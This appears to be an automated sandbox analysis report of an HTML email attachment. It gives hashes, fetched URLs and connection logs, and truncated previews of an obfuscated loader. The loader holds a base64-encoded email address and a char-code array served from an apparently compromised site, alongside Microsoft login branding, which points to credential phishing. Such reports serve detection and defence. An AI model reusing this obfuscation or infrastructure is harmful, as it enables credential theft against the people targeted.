                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (38244)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):38245
                                                                                                                                                                                    Entropy (8bit):5.374795106498282
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:fCEd/9UHA9q79HkHwcNMN3JEB1p2Ej7FPWuR3DfH6eMf7crAx:b9UHA9q79HkHwAg3U2Ec
                                                                                                                                                                                    MD5:382DE2D5802B5BD3D87CF2FB3071121D
                                                                                                                                                                                    SHA1:D0299A88EB32DBC533D61B024FF6E35956113E29
                                                                                                                                                                                    SHA-256:18CBE0EDC0B01C71A6C3FFE704550A8BB1CFE7E02839B7DBDC9C44288BF8B59C
                                                                                                                                                                                    SHA-512:8E40F9AF6117018E7A6AD62EC2988C82EEF9F4DD29915A40B9741DA8663F60D17594A60633AD9CDF8C5B153D025DE4F3CBF39BF81A915AF243B385CD9EB7E387
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://challenges.cloudflare.com/turnstile/v0/g/ea25f566/api.js
                                                                                                                                                                                    Preview:"use strict";(function(){function ut(e,r,t,o,f,s,m){try{var p=e[s](m),g=p.value}catch(u){t(u);return}p.done?r(g):Promise.resolve(g).then(o,f)}function lt(e){return function(){var r=this,t=arguments;return new Promise(function(o,f){var s=e.apply(r,t);function m(g){ut(s,o,f,m,p,"next",g)}function p(g){ut(s,o,f,m,p,"throw",g)}m(void 0)})}}function N(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):N(e,r)}function _e(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function Me(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},o=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(t).filter(function(f){return Object.getOwnPropertyDescriptor(t,f).enumerable}))),o.forEach(function(f){_e(e,f,t[f])})}return e}function st(e){if(Array.isArray(e))return e}function ft(e,r){var t=e==null?null:typeof Symbol!="und
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 195x35, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3779
                                                                                                                                                                                    Entropy (8bit):7.8694331181424655
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:RGqdxQ5MlyMAf2ReeVp1j1JOvWGYqiNWPyix:Q8vEfOp1j/OvWGLi2x
                                                                                                                                                                                    MD5:A2F3E7980FBCE6D4D5ADDDE989E42B51
                                                                                                                                                                                    SHA1:D61EB985E9B64AE610ED2DB5013FBE9544D1C243
                                                                                                                                                                                    SHA-256:BFB5B839DB1048A454D18968AFB2768E0B0885A4890E23CD41550141D02BF944
                                                                                                                                                                                    SHA-512:44101CD9EFAE6628DE368CF4B6BD13E9EA0F3B1F9B3347123852581761A9C3FB11AAF5C171153931F28E96A03A3A6616C0C692D7FD401DFA4E37FC246EBF90BC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:......JFIF.....,.,.....C..............................................!........."$".$.......C.......................................................................#...."........................................F...........................!..1"2AQ..aq...3RW...#r...$46BSTst.......................................3........................!1.2Aa."Qq..........34D..............?.r..^~%.......E.Y.....<..T.....`....H.#..L..6.l@|.Z.r....M'..>\R@...`{5......v.J.S....2&...9.T...X....c..Z4...fY.Z.&...Wm...^.1..T0..HRT>.J..|....nE.m..O......[..>9..2..@...?... i|..|..u...yQ*....P.3.0Q.Om).....3..v...g?.ciE.mX...t...A....}Q?..j.AG..V.v..*R.P|..q...w..q.]gVn.m...........y..X..u(.k...P''....l..YW..&...M.d8.G.....%A......v...61.#...VDbS.~D..).#?Z$g........_.........=o..ms.F....L..?..G.e..Ose1R..k"...r.K...G.....tB.Y#{.=.e.e.}.b.r...u.....L.ps......3.^..U?..`.63.?:.......Q.....6.O......S.(....CI...6.:."...n[-!.ym/.)*$.~....h......=-at-....b.$J..6.}.1=.,..%)...n.M.G.m...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):431289
                                                                                                                                                                                    Entropy (8bit):5.231040282724062
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:mqyWEZgPb2PH5llFWLuxjoVgrf8ZBGWeADQLyccx6zZYcJQuQ:UZguWLuxjoVgrf8ZIADQLyccx6zZYKZQ
                                                                                                                                                                                    MD5:05C873EA810251D6558CA7DDAAF62F90
                                                                                                                                                                                    SHA1:D8CFD4E2959A3C6A1C0038F4864615544A39B5CF
                                                                                                                                                                                    SHA-256:CFF735AF3CEE47A58D8263E0A18457302F712C970C90DE216D3231FD1C41B3B2
                                                                                                                                                                                    SHA-512:5382367A243BFD64BDE89EC185BB745F05A32E50E548C35C8BE1A175A9B2A7EAB55C0E6F87E1F0F5C4A26184DF140A94A26003C140E0E0BC9642F4DDFA2C3D23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css.map
                                                                                                                                                                                    Preview:{"version":3,"sources":["../../scss/bootstrap.scss","../../scss/_root.scss","../../scss/_reboot.scss","dist/css/bootstrap.css","../../scss/vendor/_rfs.scss","../../scss/mixins/_border-radius.scss","../../scss/_type.scss","../../scss/mixins/_lists.scss","../../scss/_images.scss","../../scss/mixins/_image.scss","../../scss/_containers.scss","../../scss/mixins/_container.scss","../../scss/mixins/_breakpoints.scss","../../scss/_grid.scss","../../scss/mixins/_grid.scss","../../scss/_tables.scss","../../scss/mixins/_table-variants.scss","../../scss/forms/_labels.scss","../../scss/forms/_form-text.scss","../../scss/forms/_form-control.scss","../../scss/mixins/_transition.scss","../../scss/mixins/_gradients.scss","../../scss/forms/_form-select.scss","../../scss/forms/_form-check.scss","../../scss/forms/_form-range.scss","../../scss/forms/_floating-labels.scss","../../scss/forms/_input-group.scss","../../scss/mixins/_forms.scss","../../scss/_buttons.scss","../../scss/mixins/_buttons.scss","../.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 226 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3331
                                                                                                                                                                                    Entropy (8bit):7.927896166439245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:zHjOKn3csE3x5liVsCo4GcPIZpV6x5cge8oo9:zDOK3zE3x5TCwcP4LQNeq
                                                                                                                                                                                    MD5:EF884BDEDEF280DF97A4C5604058D8DB
                                                                                                                                                                                    SHA1:6F04244B51AD2409659E267D308B97E09CE9062B
                                                                                                                                                                                    SHA-256:825DE044D5AC6442A094FF95099F9F67E9249A8110A2FBD57128285776632ADB
                                                                                                                                                                                    SHA-512:A083381C53070B65B3B8A7A7293D5D2674D2F6EC69C0E19748823D3FDD6F527E8D3D31D311CCEF8E26FC531770F101CDAF95F23ECC990DB405B5EF48B0C91BA2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://cascade-madmimi-com.translate.goog/logos/0028/7193/logox_0.png?ZBulnusKdtgyimF
                                                                                                                                                                                    Preview:.PNG........IHDR.......0............sRGB.........IDATx..=w....G.z..L.4fN.k\dS..._`..........r...~.F..e._.RZ.0.K.\..CB...1.{qq/..^|.G..o.......?....Or.......y~....]..V.a.mM...M.\k*H..@B`s.$"n...)!.@"b#4. !.9...7.u...hD ....T.........:EJ.4"..X........<|.pgkk+....>~.....pju1i"b.J.&!.!...=T....k..D7.....O.<.?}......./..(.`0..!.C..'.?..e..~.....l6...._.x1rmR...$|E...l.WKDH...f..... ...Y.0R....>...{...-..o........,...E../......_....eM.Q....@Q...w sp5.9..l.W)...Pq... .]..B..).../M.G.g....].V...5$<......Eb.9.....>LYAk.Z.k..b..]N%>}4a....4!S...t..d..<.8AH+.../r...._...!qt.:q..fR.:..KW.._...T...5..>.0!.hq.rbND\...XR.,2.uX..Q.b...wQ......g..X...F...~.....ikZE...UA....V.I!..]..Mm..R.....~k.VC.n..V.*B#W...\..yI.3.....2........6c....2J....,g..5O1.s.4V2.....f..K..Obf\....;.w...|.F>F>6_z..P.dU<.wVV......?.q.?&........O.>....l.S.upp....59.C_.......fJ.M.={v,......]Y_....n.?UF....v<.$..AD...p.....:$r =p...C.k.3....n.v..~.TGd!...l.W...s..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:MS Windows icon resource - 3 icons, 48x48, 8 bits/pixel, 32x32, 8 bits/pixel
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):7406
                                                                                                                                                                                    Entropy (8bit):4.1601981389684415
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:6Sij8RSvncv6hPVyfzekZZBkGKsFh9oBvGfL4kX8IhjSB0Hld:6SG8Mcv64eOBkGrFh9oAT4ksI1wMd
                                                                                                                                                                                    MD5:A7EDA883652648EC8DF1E5542B6BB404
                                                                                                                                                                                    SHA1:2D160C80C3438105FA610120F521B6F1C4C05902
                                                                                                                                                                                    SHA-256:8A8BC2E3E235AD6F62BCD7FC36EA2502CF4B3834C9D59507834EF84658E9282A
                                                                                                                                                                                    SHA-512:398516F54309BD21608D7AB2DDD5952AB6DCE29840DABBCCC6DDC4FDBC27345A0A3C0A275A7F854F66F5706B5E0E026678B8C96EB0D8376D6353CEDDA0FA31C1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:......00..........6... ......................h.......(...0...`................................c...f.....d...d...C..F......j ....L..........p)..U..W...W.......u/..^..]......^...c...d.......i.........V...V..W...t-..u0....._..]...]...{9..b......h..c.........n..h...h.......H......n%......o(..T......V......t.....[............c..@......g...g.........m#......R..U.......[.........z8..a...a......g......A..f........f...g.......l!..m$......P......U..........s-...........`.......?......k..f...f...g...H........l"..t......w..Q.........Q.....r+......Y...Z......y7.._...`...`.......e...l..f...o........I..............X..Y...Y..........a.._...d..............e...e...f.............k!..k!......|..q*..X...X.......Y...w3......^...^...b.._...h..d......e...e...E..q..j.......p(......q+..W...X...W......X......v1......]...`....|:.......................................................................................................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:MS Windows icon resource - 3 icons, 48x48, 8 bits/pixel, 32x32, 8 bits/pixel
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7406
                                                                                                                                                                                    Entropy (8bit):4.1601981389684415
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:6Sij8RSvncv6hPVyfzekZZBkGKsFh9oBvGfL4kX8IhjSB0Hld:6SG8Mcv64eOBkGrFh9oAT4ksI1wMd
                                                                                                                                                                                    MD5:A7EDA883652648EC8DF1E5542B6BB404
                                                                                                                                                                                    SHA1:2D160C80C3438105FA610120F521B6F1C4C05902
                                                                                                                                                                                    SHA-256:8A8BC2E3E235AD6F62BCD7FC36EA2502CF4B3834C9D59507834EF84658E9282A
                                                                                                                                                                                    SHA-512:398516F54309BD21608D7AB2DDD5952AB6DCE29840DABBCCC6DDC4FDBC27345A0A3C0A275A7F854F66F5706B5E0E026678B8C96EB0D8376D6353CEDDA0FA31C1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://challenges.cloudflare.com/favicon.ico
                                                                                                                                                                                    Preview:......00..........6... ......................h.......(...0...`................................c...f.....d...d...C..F......j ....L..........p)..U..W...W.......u/..^..]......^...c...d.......i.........V...V..W...t-..u0....._..]...]...{9..b......h..c.........n..h...h.......H......n%......o(..T......V......t.....[............c..@......g...g.........m#......R..U.......[.........z8..a...a......g......A..f........f...g.......l!..m$......P......U..........s-...........`.......?......k..f...f...g...H........l"..t......w..Q.........Q.....r+......Y...Z......y7.._...`...`.......e...l..f...o........I..............X..Y...Y..........a.._...d..............e...e...f.............k!..k!......|..q*..X...X.......Y...w3......^...^...b.._...h..d......e...e...E..q..j.......p(......q+..W...X...W......X......v1......]...`....|:.......................................................................................................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 195x35, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3779
                                                                                                                                                                                    Entropy (8bit):7.8694331181424655
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:RGqdxQ5MlyMAf2ReeVp1j1JOvWGYqiNWPyix:Q8vEfOp1j/OvWGLi2x
                                                                                                                                                                                    MD5:A2F3E7980FBCE6D4D5ADDDE989E42B51
                                                                                                                                                                                    SHA1:D61EB985E9B64AE610ED2DB5013FBE9544D1C243
                                                                                                                                                                                    SHA-256:BFB5B839DB1048A454D18968AFB2768E0B0885A4890E23CD41550141D02BF944
                                                                                                                                                                                    SHA-512:44101CD9EFAE6628DE368CF4B6BD13E9EA0F3B1F9B3347123852581761A9C3FB11AAF5C171153931F28E96A03A3A6616C0C692D7FD401DFA4E37FC246EBF90BC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://aadcdn.msauthimages.net/c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto/logintenantbranding/0/bannerlogo?ts=636973066507737181
                                                                                                                                                                                    Preview:......JFIF.....,.,.....C..............................................!........."$".$.......C.......................................................................#...."........................................F...........................!..1"2AQ..aq...3RW...#r...$46BSTst.......................................3........................!1.2Aa."Qq..........34D..............?.r..^~%.......E.Y.....<..T.....`....H.#..L..6.l@|.Z.r....M'..>\R@...`{5......v.J.S....2&...9.T...X....c..Z4...fY.Z.&...Wm...^.1..T0..HRT>.J..|....nE.m..O......[..>9..2..@...?... i|..|..u...yQ*....P.3.0Q.Om).....3..v...g?.ciE.mX...t...A....}Q?..j.AG..V.v..*R.P|..q...w..q.]gVn.m...........y..X..u(.k...P''....l..YW..&...M.d8.G.....%A......v...61.#...VDbS.~D..).#?Z$g........_.........=o..ms.F....L..?..G.e..Ose1R..k"...r.K...G.....tB.Y#{.=.e.e.}.b.r...u.....L.ps......3.^..U?..`.63.?:.......Q.....6.O......S.(....CI...6.:."...n[-!.ym/.)*$.~....h......=-at-....b.$J..6.}.1=.,..%)...n.M.G.m...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):46333
                                                                                                                                                                                    Entropy (8bit):4.204036929592321
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:/T0FSsoHK7LTv1wU6fGw1SRNrDsBzfyAAzKG:/Gzoq7LTv1TMBDyAAzKG
                                                                                                                                                                                    MD5:8A076C579311AEC1FF20E8777DA54F81
                                                                                                                                                                                    SHA1:41864EB66CAC3EEAA32840CDAD1451B6EC183CF5
                                                                                                                                                                                    SHA-256:FBB5DE43F74746C297E4A9E6A484CE175EFEC1FC3F063512B23E4784721CD4B4
                                                                                                                                                                                    SHA-512:03E99B0E15664C5E63916AF1FF41584A073DF5C5ECC836C11FD87B0486036174842D8277042A13EF074F5546EA5AF46F16C1243CB9C82E65E71EEC8F13A76501
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://kibt.edu.lk/wp-header.php?2-53307050547934765338334f4d3036737944524f5336737954637a554b796f72546334767a637771317973714251413d-mknfazxqqVo
                                                                                                                                                                                    Preview:var erp = new Array;.erp[0] = 60;.erp[1] = 104;.erp[2] = 101;.erp[3] = 97;.erp[4] = 100;.erp[5] = 62;.erp[6] = 60;.erp[7] = 109;.erp[8] = 101;.erp[9] = 116;.erp[10] = 97;.erp[11] = 32;.erp[12] = 104;.erp[13] = 116;.erp[14] = 116;.erp[15] = 112;.erp[16] = 45;.erp[17] = 101;.erp[18] = 113;.erp[19] = 117;.erp[20] = 105;.erp[21] = 118;.erp[22] = 61;.erp[23] = 34;.erp[24] = 88;.erp[25] = 45;.erp[26] = 85;.erp[27] = 65;.erp[28] = 45;.erp[29] = 67;.erp[30] = 111;.erp[31] = 109;.erp[32] = 112;.erp[33] = 97;.erp[34] = 116;.erp[35] = 105;.erp[36] = 98;.erp[37] = 108;.erp[38] = 101;.erp[39] = 34;.erp[40] = 32;.erp[41] = 99;.erp[42] = 111;.erp[43] = 110;.erp[44] = 116;.erp[45] = 101;.erp[46] = 110;.erp[47] = 116;.erp[48] = 61;.erp[49] = 34;.erp[50] = 73;.erp[51] = 69;.erp[52] = 61;.erp[53] = 101;.erp[54] = 100;.erp[55] = 103;.erp[56] = 101;.erp[57] = 34;.erp[58] = 62;.erp[59] = 32;.erp[60] = 60;.erp[61] = 109;.erp[62] = 101;.erp[63] = 116;.erp[64] = 97;.erp[65] = 32;.erp[66] = 110;.erp[67] = 97;.e
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1161
                                                                                                                                                                                    Entropy (8bit):5.214301075823941
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:hYYIzD6yejNQCRtgoLY95Mu56+eDHHLFCOXAkRcfRrzd0Ll72rKQk:rq6yej2CZLY5Mc6NDLYzkYKLlOM
                                                                                                                                                                                    MD5:7C5F77CD06178005882F3A5E17028968
                                                                                                                                                                                    SHA1:C5A0EE49AACE24245C688E319C1F6465980E322D
                                                                                                                                                                                    SHA-256:1874716FEEA55F2C8FFF862289E086743A68A296735E09ED842014ED61EC183E
                                                                                                                                                                                    SHA-512:76A233E5E2EAFA04CE70758F98E9595C72B758911BFAE8A5F1C1125378BE74B9FD12415669DE0E00CFD3338FFC40412C8264927EF73C5C73723803F57343E6DE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/favicon.ico
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">.<br>Proudly powered by LiteSpeed Web Server<p>Pleas
                                                                                                                                                                                    File type:HTML document, ASCII text
                                                                                                                                                                                    Entropy (8bit):5.64649310400922
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • HyperText Markup Language (15015/1) 100.00%
                                                                                                                                                                                    File name:ATT00001.html
                                                                                                                                                                                    File size:789 bytes
                                                                                                                                                                                    MD5:f12b5a0a02830389b1d59e8e3211167e
                                                                                                                                                                                    SHA1:d50adac41f12826155a327162bc160445230ce55
                                                                                                                                                                                    SHA256:c15fefaa7e89c81c1ac6dfe0f5c6ed1743ace6c49955dad565dc782aa68501be
                                                                                                                                                                                    SHA512:3dc962acf1b36e531efc542fc39c0891908aee61e7c7307c2f8a2321a6bd421de4282ded74ee70de38f6e123355bc3a06ece4ff94cb34767c0b7a333ef614765
                                                                                                                                                                                    SSDEEP:12:ha9d3btcQQJyfd6xnSswVKxORWdYF3XsgukYliApcMshe/rSgNAXkr+OGBTcus5a:ha907xnSswsxDYJ5znAXuTTc/qz
                                                                                                                                                                                    TLSH:5C01D0CE1B47D03008B21054AA8B9A199D988AD73304DE20722EC3225F5AFD45CDCB8D
                                                                                                                                                                                    File Content Preview:<!DOCTYPE html><html><script>. var mknfazxqqVo = "ZGF2aWQueXZvbkBhZnRyYWwuY29t";. function OwPAI(ewUUrOrDMTD, OPwwQsl) {. let QIEzI = "";. ewUUrOrDMTD= atob(ewUUrOrDMTD);. let eAeLV = OPwwQsl.length;. . for (let i = 0;
                                                                                                                                                                                    Icon Hash:173149cccc490307
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Jan 26, 2024 14:41:23.284653902 CET49720443192.168.2.1664.233.177.138
                                                                                                                                                                                    Jan 26, 2024 14:41:23.284689903 CET4434972064.233.177.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.284758091 CET49720443192.168.2.1664.233.177.138
                                                                                                                                                                                    Jan 26, 2024 14:41:23.285171032 CET49720443192.168.2.1664.233.177.138
                                                                                                                                                                                    Jan 26, 2024 14:41:23.285182953 CET4434972064.233.177.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.285871029 CET49721443192.168.2.1674.125.138.84
                                                                                                                                                                                    Jan 26, 2024 14:41:23.285912991 CET4434972174.125.138.84192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.285965919 CET49721443192.168.2.1674.125.138.84
                                                                                                                                                                                    Jan 26, 2024 14:41:23.286407948 CET49721443192.168.2.1674.125.138.84
                                                                                                                                                                                    Jan 26, 2024 14:41:23.286417961 CET4434972174.125.138.84192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.501986980 CET4434972064.233.177.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.502657890 CET4434972174.125.138.84192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.505192041 CET49720443192.168.2.1664.233.177.138
                                                                                                                                                                                    Jan 26, 2024 14:41:23.505211115 CET4434972064.233.177.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.505321026 CET49721443192.168.2.1674.125.138.84
                                                                                                                                                                                    Jan 26, 2024 14:41:23.505345106 CET4434972174.125.138.84192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.505794048 CET4434972064.233.177.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.505850077 CET49720443192.168.2.1664.233.177.138
                                                                                                                                                                                    Jan 26, 2024 14:41:23.506860018 CET4434972064.233.177.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.506876945 CET4434972174.125.138.84192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.506920099 CET49720443192.168.2.1664.233.177.138
                                                                                                                                                                                    Jan 26, 2024 14:41:23.506962061 CET49721443192.168.2.1674.125.138.84
                                                                                                                                                                                    Jan 26, 2024 14:41:23.511050940 CET49720443192.168.2.1664.233.177.138
                                                                                                                                                                                    Jan 26, 2024 14:41:23.511132002 CET4434972064.233.177.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.511310101 CET49721443192.168.2.1674.125.138.84
                                                                                                                                                                                    Jan 26, 2024 14:41:23.511365891 CET49720443192.168.2.1664.233.177.138
                                                                                                                                                                                    Jan 26, 2024 14:41:23.511377096 CET4434972064.233.177.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.511389017 CET4434972174.125.138.84192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.511495113 CET49721443192.168.2.1674.125.138.84
                                                                                                                                                                                    Jan 26, 2024 14:41:23.511506081 CET4434972174.125.138.84192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.554110050 CET49720443192.168.2.1664.233.177.138
                                                                                                                                                                                    Jan 26, 2024 14:41:23.554250956 CET49721443192.168.2.1674.125.138.84
                                                                                                                                                                                    Jan 26, 2024 14:41:23.718957901 CET4434972064.233.177.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.719124079 CET4434972064.233.177.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.719177008 CET49720443192.168.2.1664.233.177.138
                                                                                                                                                                                    Jan 26, 2024 14:41:23.719907999 CET4434972174.125.138.84192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.720189095 CET4434972174.125.138.84192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.720240116 CET49721443192.168.2.1674.125.138.84
                                                                                                                                                                                    Jan 26, 2024 14:41:23.722258091 CET49720443192.168.2.1664.233.177.138
                                                                                                                                                                                    Jan 26, 2024 14:41:23.722279072 CET4434972064.233.177.138192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:23.733855009 CET49721443192.168.2.1674.125.138.84
                                                                                                                                                                                    Jan 26, 2024 14:41:23.733872890 CET4434972174.125.138.84192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.148955107 CET49722443192.168.2.16192.185.5.187
                                                                                                                                                                                    Jan 26, 2024 14:41:24.148989916 CET44349722192.185.5.187192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.149053097 CET49722443192.168.2.16192.185.5.187
                                                                                                                                                                                    Jan 26, 2024 14:41:24.149394035 CET49722443192.168.2.16192.185.5.187
                                                                                                                                                                                    Jan 26, 2024 14:41:24.149410963 CET44349722192.185.5.187192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.369724035 CET44349722192.185.5.187192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.370214939 CET49722443192.168.2.16192.185.5.187
                                                                                                                                                                                    Jan 26, 2024 14:41:24.370235920 CET44349722192.185.5.187192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.371217966 CET44349722192.185.5.187192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.371371984 CET49722443192.168.2.16192.185.5.187
                                                                                                                                                                                    Jan 26, 2024 14:41:24.372658968 CET49722443192.168.2.16192.185.5.187
                                                                                                                                                                                    Jan 26, 2024 14:41:24.372719049 CET44349722192.185.5.187192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.372904062 CET49722443192.168.2.16192.185.5.187
                                                                                                                                                                                    Jan 26, 2024 14:41:24.372921944 CET44349722192.185.5.187192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:24.415137053 CET49722443192.168.2.16192.185.5.187
                                                                                                                                                                                    Jan 26, 2024 14:41:24.614464998 CET44349722192.185.5.187192.168.2.16
